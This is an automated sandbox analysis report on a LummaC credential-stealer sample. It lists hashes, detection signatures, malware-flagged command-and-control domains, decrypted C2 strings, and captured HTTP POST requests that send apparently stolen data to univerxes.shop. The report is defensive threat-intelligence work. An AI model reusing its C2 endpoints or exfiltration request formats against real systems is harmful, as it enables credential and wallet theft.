Windows Analysis Report
biyhoksefdad.exe

Overview

General Information

Sample name: biyhoksefdad.exe
Analysis ID: 1635456
MD5: 67af8a00aba060d6508df2389989d85d
SHA1: 455950022329a0fde1bd4c3e050f1635464cdb51
SHA256: 70870a58aa5a47c9cb1e913883e8c7e08fb49c9018dc08e05af3cad3dad203d8
Tags: exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • biyhoksefdad.exe (PID: 8332 cmdline: "C:\Users\user\Desktop\biyhoksefdad.exe" MD5: 67AF8A00ABA060D6508DF2389989D85D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: biyhoksefdad.exe PID: 8332 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: biyhoksefdad.exe PID: 8332 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.biyhoksefdad.exe.a80000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T17:29:05.556677+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 149.154.167.99 | 443 | TCP
2025-03-11T17:29:07.267963+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:09.470403+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:14.328987+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49711 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:18.163033+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:22.334502+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:27.454739+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:31.085947+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:35.252998+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:37.690865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 104.73.234.102 | 443 | TCP
2025-03-11T17:29:41.054063+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 104.73.234.102 | 443 | TCP


              AV Detection

Source: biyhoksefdad.exe | Avira: detected
Source: https://catterjur.run/boSnzhus | Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/ | Avira URL Cloud: Label: malware
Source: https://garagedrootz.top/E1o | Avira URL Cloud: Label: malware
Source: https://catterjur.run/) | Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/z | Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/v | Avira URL Cloud: Label: malware
Source: https://catterjur.run/ | Avira URL Cloud: Label: malware
Source: https://modelshiverd.icu/ | Avira URL Cloud: Label: malware
Source: biyhoksefdad.exe | ReversingLabs: Detection: 68%
Source: biyhoksefdad.exe | Virustotal: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: univerxes.shop/SwnNW
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fostinjec.today/LksNAz
Source: biyhoksefdad.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.171:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: C:\Users\user\Desktop\biyhoksefdad.exe | Directory queried: number of queries: 1001
Source: global traffic | HTTP traffic detected:
    GET /kz_prokla2 HTTP/1.1
    Connection: Keep-Alive
    Host: t.me
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199822375128 HTTP/1.1
    Connection: Keep-Alive
    Host: steamcommunity.com
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 149.154.167.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.73.234.102:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.213.171:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.73.234.102:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 172.67.213.171:443
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 65
    Host: univerxes.shop
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=75lRdx7wLp1tS9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 14917
    Host: univerxes.shop
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=fI28nppP3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15041
    Host: univerxes.shop
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=q2478UI0qTxb
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20545
    Host: univerxes.shop
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=Q73r4i0A0ZxSZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2473
    Host: univerxes.shop
Source: global traffic | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=4A9KU35TST2zC59CJ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 571127
    Host: univerxes.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: univerxes.shop
Source: global traffic | DNS traffic detected: DNS query: begindecafer.world
Source: global traffic | DNS traffic detected: DNS query: garagedrootz.top
Source: global traffic | DNS traffic detected: DNS query: modelshiverd.icu
Source: global traffic | DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic | DNS traffic detected: DNS query: catterjur.run
Source: global traffic | DNS traffic detected: DNS query: orangemyther.live
Source: global traffic | DNS traffic detected: DNS query: fostinjec.today
Source: global traffic | DNS traffic detected: DNS query: sterpickced.digital
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: unknown | HTTP traffic detected:
    POST /SwnNW HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 65
    Host: univerxes.shop
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
              Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102C000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
              Source: biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
              Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garagedrootz.top/E1o
              Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: biyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/bJhnsj
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://orangemyther.live/IozZ
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.000000000101B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
